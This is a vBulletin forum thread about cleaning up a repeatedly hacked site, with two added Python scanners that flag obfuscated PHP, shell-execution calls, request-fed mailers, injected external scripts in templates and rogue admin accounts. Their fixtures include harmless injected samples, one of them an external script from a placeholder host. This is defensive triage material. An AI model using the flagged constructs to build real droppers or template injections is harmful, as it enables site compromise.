
Forum hacked, restored, now showing bare index


loua_oz
09-08-2015, 04:00 AM
Probably the 10th time in 4 years, my forum has been hacked. This time Turkish hackers inserted "class.php" into the /includes directory; my provider (Webhostinghub) is adamant they came through some VB backdoor, which I doubt.

VB 4.2.3 all vanilla, no Mods.
Passwords for site and ftp different, 30-40 characters, free form text with blanks, uppercase, numbers.

Wiped the site out and restored from last good known backup.

All VB files are in ./public_html/forums, as in picture 1

Now it is showing bare index, as in picture 2.

When going into "forum", it does show the site is down and under maintenance.
But if anyone clicks on the pictures, it is free to look at them with no login.
(I have moved pictures to another directory since until this is resolved but picture 4 shows how it was).

Why is it going now into bare index not into the full site?

RichieBoy67
09-08-2015, 04:21 AM
Did you look under diagnostics to see what files are left and check your plug-ins as well?

--------------- Added 1441693369 at 1441693369 ---------------

If you were hacked many times then chances are they did leave a "door" on your site which was never patched.

loua_oz
09-08-2015, 04:28 AM
I wiped out the site, removed directories and created them afresh this morning.

Maintenance - diagnostics shows nothing strange.
The site is vanilla, no plugins, nothing that did not come with VB.

Hacking my site is rather like farming web services users hosted by that provider, using them as bots. Wells Fargo sent me once to stop spamming from my site.

Only 2 out of 10 times they shut down the site with some message.

RichieBoy67
09-08-2015, 04:40 AM
Sounds like you have a ton of stuff on there still. Go under maintenance and run the diagnostics. Check your plug-ins as well.

I really do not know what you mean by you wiped everything out. You reinstalled vBulletin fresh or just uploaded clean files? In that case you did not overwrite the hacked files, which may not only have been vBulletin.

There are many things you need to do even after you clean this to make sure it is secure, but it looks like you have a long way to go.

loua_oz
09-08-2015, 06:38 AM
This is what it was:
The .htaccess file was not in the root directory. After blasting the entire installation, it, of course, did not come back with the VB install. Dragged it from backup and all fine.

That file contains redirection to the home page; without it, it defaults to bare index.

RichieBoy67
09-08-2015, 06:48 AM
Ok good. You installed a fresh copy of Vbulletin? I am a little confused but glad it is working anyways. :)

loua_oz
09-08-2015, 08:27 AM
Honestly, I don't know what is different this time. If the hacker who broke in yesterday is pleased to do it again today, the same hole would be ready for him.

Whether they come through cPanel, the site itself or through VB, nothing has changed, even if VB is a fresh install. The hosting site said it was not through ftp. They also said the password was not used to get in; how they know, through their logs probably.

HM666
09-08-2015, 09:40 AM
Are you on shared hosting? That is the most common way that hackers get in and it IS the host's fault in most cases, NOT vBulletin, if it's a fresh install with no mods added on. Shared hosting is famous for not being very secure. I suggest, if you are, that you either change hosts or get a VPS instead where you can control the security.

loua_oz
09-08-2015, 09:57 AM
Yes, possible.
Yes again, shared hosting, it may well be their problem. As I said, seems the hackers waltz in and farm the users and their sites without apparent problem with their sites. They (webhostinghub.com) applied some measures that alert me when (some, what their poor security can detect) it happens. They quarantine the malicious code but still - it comes through their lack of security.

Issues like this have a potential to drive a hosting company out of business.

If any, the luck is my site is not commercial, no money loss. But hours lost to restore by me for someone who had ruined my site for fun.

When I asked webhostinghub.com why don't they introduce 2 level login (with RSA dongle) they said it could fix cPanel only but not "3rd Party software", possibly implying VBulletin to be at fault.
They confirmed nobody had compromised my passwords and logged in.

I still believe it is cPanel, an independent vendor, who is at fault.
No offers for help (paid) from this site would fix it. It is not VB, I think.

RichieBoy67
09-08-2015, 12:21 PM
Well it could be hosting but my guess is that it is something you have missed.

Did you delete all the files on your server and reinstall fresh? Did you run the diagnostics to look for third party files?

Have you been with this same host all the other times you were hacked?

HM666
09-08-2015, 04:40 PM
Yes, possible.
Yes again, shared hosting, it may well be their problem. As I said, seems the hackers waltz in and farm the users and their sites without apparent problem with their sites. They (webhostinghub.com) applied some measures that alert me when (some, what their poor security can detect) it happens. They quarantine the malicious code but still - it comes through their lack of security.

Issues like this have a potential to drive a hosting company out of business.

If any, the luck is my site is not commercial, no money loss. But hours lost to restore by me for someone who had ruined my site for fun.

When I asked webhostinghub.com why don't they introduce 2 level login (with RSA dongle) they said it could fix cPanel only but not "3rd Party software", possibly implying VBulletin to be at fault.
They confirmed nobody had compromised my passwords and logged in.

I still believe it is cPanel, an independent vendor, who is at fault.
No offers for help (paid) from this site would fix it. It is not VB, I think.

Always try to have frequent backups. But I'm guessing you have already got that under control. Has the hosting company upgraded cPanel lately? Do you know? I know mine upgraded my cPanel WHM within the last month or two, so possibly it's an old version. No idea.

Well it could be hosting but my guess is that it is something you have missed.

Did you delete all the files on your server and reinstall fresh? Did you run the diagnostics to look for third party files?

Have you been with this same host all the other times you were hacked?

Yeah, all good questions in trying to find the issue. Also, are you sure that there is no portion of the hack in the vBulletin database itself? Since you keep on getting the same thing, that may be possible as well.

loua_oz
09-08-2015, 07:54 PM
This whole business is Mickey Mouse; I am not surprised it gets hacked, the surprise is it has ever worked at all.

The hosting company upgraded cPanel (another mickeymousepieceofsh1t) 2 months ago.

The day I changed my password into free text and as guessable as "Walked d0wn the str1t and heard d0g fart while black dog humped the white 0ne" they sprayed me with banners like "Hackers can guess your password and (must click): Accept the risk: Yes No".

That tells how helpless they are.

Should I change the provider? I could, just to see that the new one is as clueless as the previous.

RichieBoy67
09-08-2015, 09:55 PM
Well we still do not know for sure it is your server. You have not answered my questions.

#1 - Did you wipe all the files off the server and reinstall vBulletin fresh?

#2 - Did you run diagnostics and check for files that do not belong? Did you check those files and look for debase64 code?

#3 - Did you go into the plug-in manager and look for plug-ins that should not be there?
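A defender-side way to do RichieBoy67's #2 check over a web root, as an added example that is not from this thread or from vBulletin: walk the install tree, flag files missing from a known-good manifest, files whose mtime is newer than a cutoff (the "timestamp that sticks out"), world-writable files, and PHP files carrying obfuscation or mailer markers. The manifest, the sample files and the includes/.htaccess expectation are constructed for the demo; a real run would build the manifest from a clean vBulletin package.

```python
import os
import re
import stat
import tempfile
import time
from pathlib import Path

# Obfuscation / dropper markers that the "look for debase64 code" advice
# points at. A hit is a triage signal for manual review, not proof.
MARKERS = [
    ("base64_decode", re.compile(rb"base64_decode\s*\(")),
    ("eval", re.compile(rb"\beval\s*\(")),
    ("gzinflate", re.compile(rb"gzinflate\s*\(")),
    ("str_rot13", re.compile(rb"str_rot13\s*\(")),
    ("command execution", re.compile(rb"\b(?:shell_exec|passthru|system|popen)\s*\(")),
    # spam mailers like the thread's "maill.php" typically feed request input into mail()
    ("mail() fed from request", re.compile(rb"\bmail\s*\(.*?\$_(?:POST|GET|REQUEST)", re.S)),
]
PHP_SUFFIXES = {".php", ".phtml", ".inc", ".php5"}


def scan_webroot(root, manifest, modified_after):
    """Walk `root` and return sorted (relative_path, [reasons]) for files worth a look.

    manifest: set of relative paths belonging to the known-good package
    (assumed to be built from a clean vBulletin download; not part of the thread).
    modified_after: epoch seconds; a newer mtime is the "timestamp that sticks out".
    """
    root = Path(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            reasons = []
            if rel not in manifest:
                reasons.append("not in manifest")
            st = path.stat()
            if st.st_mtime > modified_after:
                reasons.append("modified after cutoff")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if path.suffix.lower() in PHP_SUFFIXES:
                data = path.read_bytes()
                hits = [label for label, rx in MARKERS if rx.search(data)]
                if hits:
                    reasons.append("suspicious code: " + ", ".join(hits))
            if reasons:
                findings.append((rel, reasons))
    return sorted(findings)


def config_checks(root):
    """Checks drawn from the thread: config.php must not be world-writable (644 is
    expected) and the includes directory should carry an .htaccess denying direct access."""
    root = Path(root)
    issues = []
    cfg = root / "includes" / "config.php"
    if cfg.exists() and cfg.stat().st_mode & stat.S_IWOTH:
        issues.append("includes/config.php is world-writable (expected 644)")
    if not (root / "includes" / ".htaccess").exists():
        issues.append("no includes/.htaccess denying direct access")
    return issues


def build_demo():
    """Construct a throwaway install tree; every file here is made up for the demo."""
    root = Path(tempfile.mkdtemp(prefix="vb_triage_"))
    clean = {
        "index.php": b"<?php\nrequire_once('./global.php');\n",
        "includes/config.php": b"<?php\n$config['MasterServer']['username'] = 'dbname_admin';\n",
    }
    injected = {
        "includes/class.php": b"<?php\neval(base64_decode('ZWNobyAnaGknOw=='));\n",
        "maill.php": b"<?php\nmail($_POST['to'], $_POST['subj'], $_POST['body']);\n",
    }
    cutoff = time.time() - 30 * 86400          # anything newer than 30 days is "recent"
    old = cutoff - 365 * 86400
    for rel, body in {**clean, **injected}.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)
        os.chmod(p, 0o644)
        if rel in clean:
            os.utime(p, (old, old))             # backdate the legitimate files
    os.chmod(root / "maill.php", 0o666)         # the dropped mailer is world-writable
    return root, set(clean), cutoff


if __name__ == "__main__":
    demo_root, demo_manifest, demo_cutoff = build_demo()
    for rel, reasons in scan_webroot(demo_root, demo_manifest, demo_cutoff):
        print(f"{rel}: {'; '.join(reasons)}")
    for issue in config_checks(demo_root):
        print("config:", issue)
```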

loua_oz
09-08-2015, 10:18 PM
Trivialities like that were done even before I posted here.

Whole root directory "rm -r", wiped out
Fresh install of VB 4.2.3
There are no plugins, all vanilla
Maintenance-Diagnostics shows nothing that should not be there

And then, I asked here why it is not going into the Forum home page and you went around and around (offering paid service via PM) instead of (if you knew it) telling me there is an
.htaccess
file missing and that it does not come with a fresh install.

TheLastSuperman
09-08-2015, 11:37 PM
Ok so the folders and files were restored from your backup... was this a complete backup meaning - Did it contain the folders, files, AND all databases?

- If you restored the folders and files only, then the hacker apparently altered your database.
-- The reason we would speculate this to be the cause is: you stated you completely wiped the root directory, therefore uploading 100% fresh files did not fix this per your screenshot, so one would be safe to assume (despite the saying regarding that, lol) that they altered your actual database. I myself have seen sites where they altered all files and also inserted their web template w/ all the hacker info and silly rubbish into all templates in the style, every single template, so more than you think could quite possibly be going on here; you never know until you really dig into it.
**Be careful wiping all files: most owners store their attachments in the actual filesystem, and by simply deleting all "possibly" infected files you would in turn be deleting all attachments - ACK! So always check settings first before blindly deleting folders and files. I would have moved all the contents of the forums root into a new folder and CHMOD it 000 to prevent anything from running; that way, if attachments were stored there, you could check and clean them later if need be, then simply CHMOD back to correct permissions and restore the files to the correct location.

-If you restored a complete backup including all folders, files, and databases then something else must be "up" or wrong. They may or may not have uploaded a shell script or similar such as c99 madshell (http://www.derekfountain.org/security_c99madshell.php) or a variant and went about modifying what they could and wanted to regarding the actual server.
-- Yes, a hacker can gain access to one site on a shared server and from there gain access to others; it's not the hardest thing to do and happens all the time when people do not keep software up-to-date in regards to security and exploits. If your site is a VPS/Dedicated they can still modify the server to a certain degree if they have a shell script in place, of course depending on the sophistication of the script being used.

Check on vBulletin.com for posts and blog posts by myself and Zachery - we have useful info and queries to run that help you look for such things. Edit: Two links I included in my next post following this one.

TheLastSuperman
09-08-2015, 11:46 PM
.htaccess
file missing and that does not come with fresh install.

It does; however, it's located in the do_not_upload folder. Despite the folder's name you do actually upload one of the .htaccess files in said sub-folders depending on your setup. So yes, upon initial installation it's not there; now let's say someone wanted to use Mod Rewrite Friendly URLs instead of the basic ones, they would have upon installation uploaded the .htaccess file required to make mod rewrite friendly URLs work in vBulletin.

So this may or may not simply be a case of a missing .htaccess file; also yes, removal of or changes to an .htaccess file can make the site display wonky as if the formatting is off. Also bear in mind that over the course of a ten year span with being hacked upwards of four times... the settings and such, despite it being vanilla in regards to modifications, could still have template edits or other changes made internally that do not show nor are reflected in the actual files. So a call to a site or a file inserted into a template could be your backdoor here as well; I'd go through the database and use the queries in our blog posts to see if anything comes up.

Edit: Here are two links, backup your database if not already before doing anything;
http://www.vbulletin.com/forum/blogs/zachery/3993888-fixing-your-site-after-you-have-been-hacked
http://www.vbulletin.com/forum/articles/community-tutorials/4023667-recovering-a-hacked-vbulletin-site

Edit yet again! Per your second screenshot, looks as if you had the CMS set up in the root folder, and all the forum files uploaded to /forums/, so make sure you do the same setup again if that was the case. If a pertinent file is missing such as index.php (and nothing else such as an index.html file exists) then it has no way to render a missing file and will therefore list the contents of the directory. Basically to sum it up, servers are typically set up to look in a certain order for important files, or well I should phrase it "looks for commonly known files such as index.php and index.html, index.aspx or similar as they render content to browsers"; usually it looks for index.php first then looks for index.html, which by the way can be changed, i.e. the order, but in your case seems as if some files were not uploaded properly after restoring.
*****Just make sure you grasp that: you had set up the CMS in the root and the forums into /forums/, then read the info on how to set up the CMS in root and forums in a folder (http://www.vbulletin.com/vbcms/content.php/295-FAQ-How-to-install-CMS-in-Root-Forums-in-subdirectory) and ensure it's all done correctly and you *should* be back to normal unless of course, like I initially suspected, the hacker modified the actual database.

bremereric
09-09-2015, 12:26 AM
I just stepped up to Sucuri's cloud proxy firewall, after the 5th time I have been hacked.

HM666
09-09-2015, 01:28 AM
Yeah, my thought was after all files had been deleted the only thing left is something put into the database. I've seen client sites that were hacked not only in the physical files but they also somehow gained access into the admin panel and put some weird non-vb stuff in the templates, mainly calling their hack into the site instead of your regular vBulletin front page or other pages. Then if you make a full backup of your database after that hack happens, it's still lodged in there, and you restore and voila, the hacker is back. This is definitely something you should check when trying to completely rid yourself of the hack and get your site back on track. The thing here is if this is in your database then even if you switch hosts the hack will follow you. So there are some things that you really need to check out first before deciding to make a move to a new host.

Not too long ago there was a hacker that went around gaining access to vB web sites via this kind of hack. They would upload files on the site and put stuff in the templates. To know if you had this kind of hack was pretty simple. You all of a sudden out of nowhere had a newly registered member that was an admin and had access to your ACP and there were admins other than the ones you had in place logging into the panel. Simply deleting their account and deleting the physical files did not kill the hack because they had put some hacker code into random templates.

Now if that is not the case and you do not remember deleting any random weird rogue admin accounts then, as others have said, it's possible there is something else going on or the hack is elsewhere. It's best to make 100% sure that if you switch hosts this hack is not lurking about in your database before proceeding. :)
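The database side of what HM666 describes, as an added example that is not from this thread or from the vbulletin.com blog posts: scan the template, plugin and user tables for injected markup, obfuscated hook code, and admin accounts nobody created. The column names follow vBulletin 4's schema as I recall it (template_un holds uncompiled template source, usergroupid 6 is Administrators) and are an assumption; the in-memory sqlite3 tables and rows are constructed stand-ins for a MySQL dump, and the queries avoid driver-specific parameter styles so the same functions work on a MySQL connection.

```python
import re
import sqlite3

# Things that do not belong in forum templates ("weird non-vb stuff") ...
TEMPLATE_MARKERS = [
    ("external script", re.compile(r"<script[^>]+src\s*=\s*[\"']?(?:https?:)?//", re.I)),
    ("iframe", re.compile(r"<iframe\b", re.I)),
    ("javascript eval/fromCharCode", re.compile(r"\beval\s*\(|fromCharCode", re.I)),
    ("meta refresh redirect", re.compile(r"<meta[^>]+http-equiv\s*=\s*[\"']?refresh", re.I)),
]
# ... or in plugin hook code that runs on every request.
PLUGIN_MARKERS = [
    ("base64_decode", re.compile(r"base64_decode\s*\(")),
    ("eval", re.compile(r"\beval\s*\(")),
    ("file write", re.compile(r"\b(?:file_put_contents|fwrite|fopen)\s*\(")),
    ("command execution", re.compile(r"\b(?:shell_exec|passthru|system|exec)\s*\(")),
    ("remote fetch", re.compile(r"\b(?:file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I)),
]
ADMIN_USERGROUP = 6   # assumed: vBulletin's default "Administrators" usergroupid


def suspicious_templates(conn):
    """(styleid, title, [markers]) for templates whose uncompiled source carries injected markup."""
    rows = conn.execute("SELECT styleid, title, template_un FROM template").fetchall()
    out = []
    for styleid, title, body in rows:
        hits = [label for label, rx in TEMPLATE_MARKERS if rx.search(body or "")]
        if hits:
            out.append((styleid, title, hits))
    return out


def suspicious_plugins(conn):
    """(pluginid, title, hookname, active, [markers]) for hooks with obfuscated or dangerous PHP."""
    rows = conn.execute("SELECT pluginid, title, hookname, phpcode, active FROM plugin").fetchall()
    out = []
    for pluginid, title, hook, code, active in rows:
        hits = [label for label, rx in PLUGIN_MARKERS if rx.search(code or "")]
        if hits:
            out.append((pluginid, title, hook, bool(active), hits))
    return out


def unexpected_admins(conn, expected_usernames):
    """Admin-group accounts not on the owner's list: the 'rogue admin' sign HM666 mentions."""
    rows = conn.execute("SELECT userid, username, usergroupid FROM user").fetchall()
    return [(uid, name) for uid, name, gid in rows
            if gid == ADMIN_USERGROUP and name not in expected_usernames]


def build_demo_db():
    """Constructed stand-in for the three tables; one injected row in each."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE template (templateid INTEGER, styleid INTEGER, title TEXT, template_un TEXT);
        CREATE TABLE plugin (pluginid INTEGER, title TEXT, hookname TEXT, phpcode TEXT, active INTEGER);
        CREATE TABLE user (userid INTEGER, username TEXT, usergroupid INTEGER);
    """)
    conn.executemany("INSERT INTO template VALUES (?,?,?,?)", [
        (1, 1, "header", '<div id="header"><a href="forum.php">Forum</a></div>'),
        # legitimate local script include: must not be flagged
        (2, 1, "headinclude", '<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=423"></script>'),
        # injected: external script hung off the footer of every page
        (3, 1, "footer", '<div id="footer"></div><script src="//cdn.example.invalid/k.js"></script>'),
    ])
    conn.executemany("INSERT INTO plugin VALUES (?,?,?,?,?)", [
        (1, "Forum Stats", "global_start", "$stats = 1;", 1),
        (2, "Cache Tweak", "global_complete", 'eval(base64_decode("ZWNobyAnaGknOw=="));', 1),
    ])
    conn.executemany("INSERT INTO user VALUES (?,?,?)", [
        (1, "loua_oz", 6), (2, "helpdesk", 6), (3, "member1", 2),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_demo_db()
    print("templates:", suspicious_templates(db))
    print("plugins:  ", suspicious_plugins(db))
    print("admins:   ", unexpected_admins(db, {"loua_oz"}))
```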

loua_oz
09-09-2015, 02:56 AM
Thank you,
The hacked directory (root and subdirectories) was saved by the provider as soon as I requested them to take down the site (it was displaying the hackers' message and I could not get into admin to shut it down).

Just went in and chmod to 000 what they saved, thanks for that. Poking around the site there is nothing visibly wrong.

If a file or directory is touched, it shows a timestamp that sticks out when the directories are listed.
Several times I saw things like "maill.php" that was inserted without harming the site contents.

Indeed, as I am on the shared server, could be 100s of sites hosted on one physical machine.
However disciplined I might be, a slack site owner on the server may invite trouble for all?

Is there some tool to check the database? The cPanel provided by webhostinghub.com has "database repair" and it ran cleanly.

--------------- Added 1441775800 at 1441775800 ---------------

Just remembered. In

./includes/config.php

there is a hardcoded database name and password, in plain sight, unencrypted

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'dbname_admin';
$config['MasterServer']['password'] = 'unencripted_password';

Is that how it should be? Never seen that in my life.

alcazarx
09-09-2015, 02:25 PM
Most webscripts store config data in plain text; under normal conditions users can't view/use them.
If a hacker has access to the files of your script it doesn't matter if the data is encrypted or not, he can get it by decrypting them (unless it's one-way encryption).

As for the DB, you have to check it manually if it's OK (or send it to an expert here); the "repair" functions that the DB or hostings offer are to fix damaged tables or DBs, not to remove unwanted elements.

squidsk
09-09-2015, 04:19 PM
Just remembered. In

./includes/config.php

there is a hardcoded database name and password, in plain sight, unencrypted

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'dbname_admin';
$config['MasterServer']['password'] = 'unencripted_password';

Is that how it should be? Never seen that in my life.

That's normal because you should have an .htaccess or equivalent that denies access to files within the includes directory. Where else would you store it? You can't store it in the db because you need the db username and password to access the db.

loua_oz
09-09-2015, 08:33 PM
As for the DB, you have to check it manually if it's OK (or send it to an expert here); the "repair" functions that the DB or hostings offer are to fix damaged tables or DBs, not to remove unwanted elements.

What experts? Those telling me that a plain password in an ASCII file is normal?
And what after "experts" have checked the db? A hacker capable of getting into my site would just have to go and copy/paste the DB admin user name and password offered on a plate.

For decades Unix has /etc/passwd and /etc/shadow files where encrypted passwords are stored.

ozzy47
09-09-2015, 09:01 PM
That is why you should protect files via .htaccess

loua_oz
09-09-2015, 09:13 PM
.htaccess does not come with vanilla install.

People off the street would not know what it is but would know that plain text passwords are a bad idea.

Ridiculous: it is like saying that your house will be broken into one way or another if someone really wants to do that so no need to lock it up.

ozzy47
09-09-2015, 10:07 PM
The same could be said for people having to be told to put locks on their houses. Bottom line is do your research.

But I seriously doubt that is why you have been hacked so many times. If that was the case, this site, van.com as well as millions of other sites would be hit as often as yours, if not on a daily basis.

loua_oz
09-10-2015, 01:18 AM
There are 100s of VB sites hacked daily; the most hacked product in board software history is exactly VB 4. My hosting provider could be targeted and vulnerable; I came in just as run-of-the-mill together with other sites. Once there, they have the plain text DB admin user and password.

What research should I do and why? I bought a product that should work like a fridge, without researching anything about it.

Opponents of VB would have a field day reading what "experts" here are advocating.

TheLastSuperman
09-10-2015, 01:31 AM
Opponents of VB would have a field day reading what "experts" here are advocating.

Which is nothing. We're simply trying to steer you in the right direction i.e. cleanup so your site is back to normal.

Go ahead, visit your site and type in the path to the config file; let's use vbulletin.org as an example: https://vborg.vbsupport.ru/includes/config.php

Even if there was no .htaccess protection, based on how the site serves content you could not download the file as it sits on the server, only save a copy of the file after it's rendered; therefore you cannot know the file's contents (original contents, i.e. code, only what is parsed afterwards).

Another example from http://www.thebiggestboards.com/vbulletin-forums.php would be ConceptArt.org, so go ahead, visit this URL then download the config.php (http://www.conceptart.org/forums/includes/config.php) file or however you would go about it... now tell us all the database username and password - I'll be waiting.

Long story short, I would be waiting a very long time. You seem to know a little based on what you've spent time researching but clearly do not know what you're talking about; no offense intended, just simple fact. I applaud your effort, don't get me wrong, I wish half those I dealt with would take the time to do the research you did, and I can explain all this to you above ^ but I can't understand it for you. I need you to take more time and do more research before speaking like you did above; I tell you this because I would want someone to tell me if a booger was hanging out my nose instead of letting me walk into a crowded room and speak highly about a subject while not knowing how I looked to others.

Remember if you need clarification on something just ask but being sore over a hacked site because you feel something is wrong with the software when you do not understand it, is not the way to go about things.

Edit: I assume you've already added a new user to the database with all privileges, then removed the old user and updated the config.php file? If not please do so; the hacker more than likely knows your database details now since he hacked you. If you left these the same after the first time you were hacked then it's no surprise he/she hacked you again.

RichieBoy67
09-10-2015, 01:32 AM
It doesn't work that way. A website is not a "Fridge". It requires updates and care and maintenance.

I would be willing to bet that you really only got hacked once from failure to do a patch or something like that and you just never fixed it correctly. Now they can come and go as they wish.

I have had vBulletin sites for years and only got hacked once, many, many years ago when I did not know what I was doing. Keep up to date, be careful with your plug-ins and file permissions and take some precautions and you will be less likely to get hacked.

--------------- Added 09 Sep 2015 at 23:33 ---------------

I would be interested in knowing what version got hacked originally.

--------------- Added 09 Sep 2015 at 23:35 ---------------

Also, what are you talking about "plain text passwords"? Passwords are not stored anywhere as text. OK, I see you are talking about the file system. Every script I have used, WordPress, Joomla and countless others, has a config file with this information. That file should never be seen by anyone unless using FTP, and if a hacker already is that far then you have already been hacked.

--------------- Added 09 Sep 2015 at 23:36 ---------------

Thank you,
The hacked directory (root and subdirectories) was saved by the provider as soon as I requested them to take down the site (it was displaying the hackers' message and I could not get into admin to shut it down).

Just went in and chmod to 000 what they saved, thanks for that. Poking around the site there is nothing visibly wrong.

If a file or directory is touched, it shows a timestamp that sticks out when the directories are listed.
Several times I saw things like "maill.php" that was inserted without harming the site contents.

Indeed, as I am on the shared server, could be 100s of sites hosted on one physical machine.
However disciplined I might be, a slack site owner on the server may invite trouble for all?

Is there some tool to check the database? The cPanel provided by webhostinghub.com has "database repair" and it ran cleanly.

--------------- Added 09 Sep 2015 at 01:16 ---------------

Just remembered. In

./includes/config.php

there is a hardcoded database name and password, in plain sight, unencrypted

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'dbname_admin';
$config['MasterServer']['password'] = 'unencripted_password';

Is that how it should be? Never seen that in my life.

Nobody should ever be able to see that if your file permissions are correct. If you can see that in plain sight you have a problem with your file permissions. Most files should be at 644.

cellarius
09-10-2015, 05:30 AM
This debate is ridiculous. Every webscript I have ever used has database credentials in plain text in a config file. There's just no other way to do it, since the script has to be able to access this information. Of course you could encrypt it, but since the script needs to be able to decrypt it again to use it, you'd have to store the key somewhere. As others have pointed out, the config file can't be accessed from the outside. If an attacker has access to your ftp or shell, it's really too late.

loua_oz
09-10-2015, 05:42 AM
My site is back to normal, has been since first 3-4 posts here and without anyone's help.
- File permissions are 644, directories 755.
- Originally it was 4.1 hacked in 2010. That was before the warning "remove install directory" was issued; even specialist installation by VB staff left it onsite. Site re-provisioned.
- Months of experimenting with the site, Mods, plugins, messing...wiped the site and got another specialist installation (May 2011, Jake Bunce did it).
- over the years, 6 times found (using Maintenance - Diagnostics) .php files that are not part of VB; a glance through and they seemed to be spam mailers
- 2 times webhostinghub.com located and quarantined spam mailers (since they upgraded their software 3 months ago)
- 1 time found (last week) a file "class.php" in the includes directory
- on Monday the site was hacked and taken down

Keep on changing passwords to 40 characters long, spaces, mixed letters.

Daily run of Diagnostics. Daily backups.

--------------- Added 1441871454 at 1441871454 ---------------

This debate is ridiculous. Every webscript I have ever used has database credentials in plain text in a config file. There's just no other way to do it, since the script has to be able to access this information. Of course you could encrypt it, but since the script needs to be able to decrypt it again to use it, you'd have to store the key somewhere. As others have pointed out, the config file can't be accessed from the outside. If an attacker has access to your ftp or shell, it's really too late.

Let's see why this debate is ridiculous: because coders and VB staff participating here have not told us (may well be news to them) that plain text database admin user name and password in

/includes/config.php

are used when initially creating the database from the sheet supplied for paid install or from own notes. Some may stay with that password, most would change it.

Just changed my cPanel, mail and database passwords and in

/includes/config.php

the password is the same as it was upon creation, should not be valid. But the site does not care.

That is another question: why is it then in /includes, why not in /install and removed before the site is powered up?

cellarius
09-10-2015, 07:31 AM
Let's see why this debate is ridiculous: because coders and VB staff participating here have not told us (may well be news to them) that plain text database admin user name and password in

/includes/config.php

are used when initially creating the database from the sheet supplied for paid install or from own notes. Some may stay with that password, most would change it.
So - now you're accusing vB staff of hacking your board? That's ridiculous. Believe me, all of your discoveries are nothing new to anyone here. Every single customer who has read the installation instructions and installed vB knows config.php and its contents, because everyone has edited it themselves. Also, everyone who has only the slightest clue of web development knows that and why you need such files.

Just changed my cPanel, mail and database passwords and in

/includes/config.php

the password is the same as it was upon creation, should not be valid. But the site does not care
Then you did not change the password of the database vB uses. Period. If you change the database password, and do not edit it in config.php accordingly, the site will stop working and throw database errors. Just give it a try. Change your password in config.php to something random, and your site will break immediately.

That is another question: why is it then in /includes, why not in /install and removed before the site is powered up?
Because, as any other webscript, vB requires certain basic access data in order to work. If you remove config.php, your site will break. Again: Just try it. Delete (or better: rename) config.php. Your site will break immediately.

You're lashing out at everyone and everything here, making wild accusations, yet obviously having only very limited knowledge of what you're talking about.

It's sad that you have been hacked numerous times, but it will not help you at all if you're pointing at a perfectly normal file with perfectly normal contents.

You really need to understand this: If someone is able to read the contents of your config.php, you already have been hacked. It's too late.

Step back, calm down, breathe through. There's people here trying to help you, and you're lashing out at them in a way that is really not called for.

loua_oz
09-10-2015, 09:29 AM
True, renaming config.php stopped the site.

Then, my provider is telling me what is either not true or I don't understand

You have changed password for

ftp
mysql
mail

Sorry if I have left that taste of lashing on everyone, my apologies.

TheLastSuperman
09-10-2015, 10:15 AM
It's OK loua, you're frustrated; we understand and we really just want you to understand so it's easier on you. Despite some of our comments, always take them with a grain of salt my friend :D.

- Think of it this way: yes, you're right it's stored right there in the file, but how can they get to it using my example above? If anyone could simply download that file hackers would be taking down sites by the second; most software, vBulletin, IPB, even free phpBB forums, WordPress, the lot of them, all use some form of configuration file where the details are stored.

Regarding your issue: Yes, if you went into cPanel and changed the database user's password, then nothing "automatically" changed it everywhere else for you :( so with that being said, hurry and edit config.php with the new password and it should come right back up :). Also you cannot simply rename config.php to another name unless you make other file edits; best to leave it as-is unless testing as Cell mentioned above. One other thing to mention is, whoever set up the forum initially had to manually rename config.php.new to config.php, then edit the file and enter your database name, username, and password to the database, so that is why most of us were shocked by your statements; we just couldn't figure out why this was just now surprising you... I see where you were coming from, sure it's thinkable, but glad we steered you in the right direction!

cellarius
09-10-2015, 10:18 AM
Without knowing what exactly you asked your provider, what you did in cpanel, and what exactly their answer was we really can't comment properly. No offense, but from the course of this thread I tend to believe that there may be some misunderstandings on your part.

It really seems your site (including the database, not only the files!) was never properly scanned for hidden backdoors etc. after the first attack. As others have speculated, I would assume that all those attacks may be follow-ups. Whatever your password, however secure, if there's some sort of backdoor present, it won't help you (since they don't have to get in, they are already in - all the time). But all of this has nothing to do with config.php, really.

X-or
09-10-2015, 11:39 AM
The only time I got hacked was because I used a malicious FTP client.

Use only FileZilla downloaded from their official site.

It could also be a password stealer or other types of malware on your computer.

Do you use cracked apps or games downloaded from P2P sites? Obviously you'll answer you don't, but for the record they're almost always infected with malware.

HM666
09-10-2015, 12:10 PM
The only time I got hacked was because I used a malicious FTP client.

Use only FileZilla downloaded from their official site.

It could also be a password stealer or other types of malware on your computer.

Do you use cracked apps or games downloaded from P2P sites? Obviously you'll answer you don't, but for the record they're almost always infected with malware.

I'm sorry, but this has nothing to do with an FTP client. There are many clients that work just fine. I use FlashFXP and have used it for 15 years and NEVER had the FTP client cause an issue elsewhere on ANY server. Whatever you downloaded and installed may have had a virus in it, but I would imagine it would affect your PC; although I do not doubt it's possible to somehow infect your server, I think that it is not really probable that this is an FTP client issue for the OP.

Also cracked programs have nothing to do with what the OP is talking about. I'm not really sure where you are going here.

X-or
09-10-2015, 02:34 PM
That's normal because you should have an .htaccess or equivalent that denies access to files within the includes directory. Where else would you store it? You can't store it in the db because you need the db username and password to access the db.

You missed his point, which is that the password isn't encrypted.

Also cracked programs have nothing to do with what the OP is talking about. I'm not really sure where you are going here.

You don't see how malware such as password stealers could have caused the OP's problems? Well....

squidsk
09-10-2015, 05:40 PM
You missed his point which is the password isn't crypted.

Not really, you missed the point that if the file is not accessible, the password within the file does not need to be encrypted because no one can access it to see it. You only need to encrypt things if you don't want others who are looking at it to be able to see what it is. Since no one can look at it, in a properly configured setup, why would it be encrypted, as all that does is add unneeded overhead to every single page view?


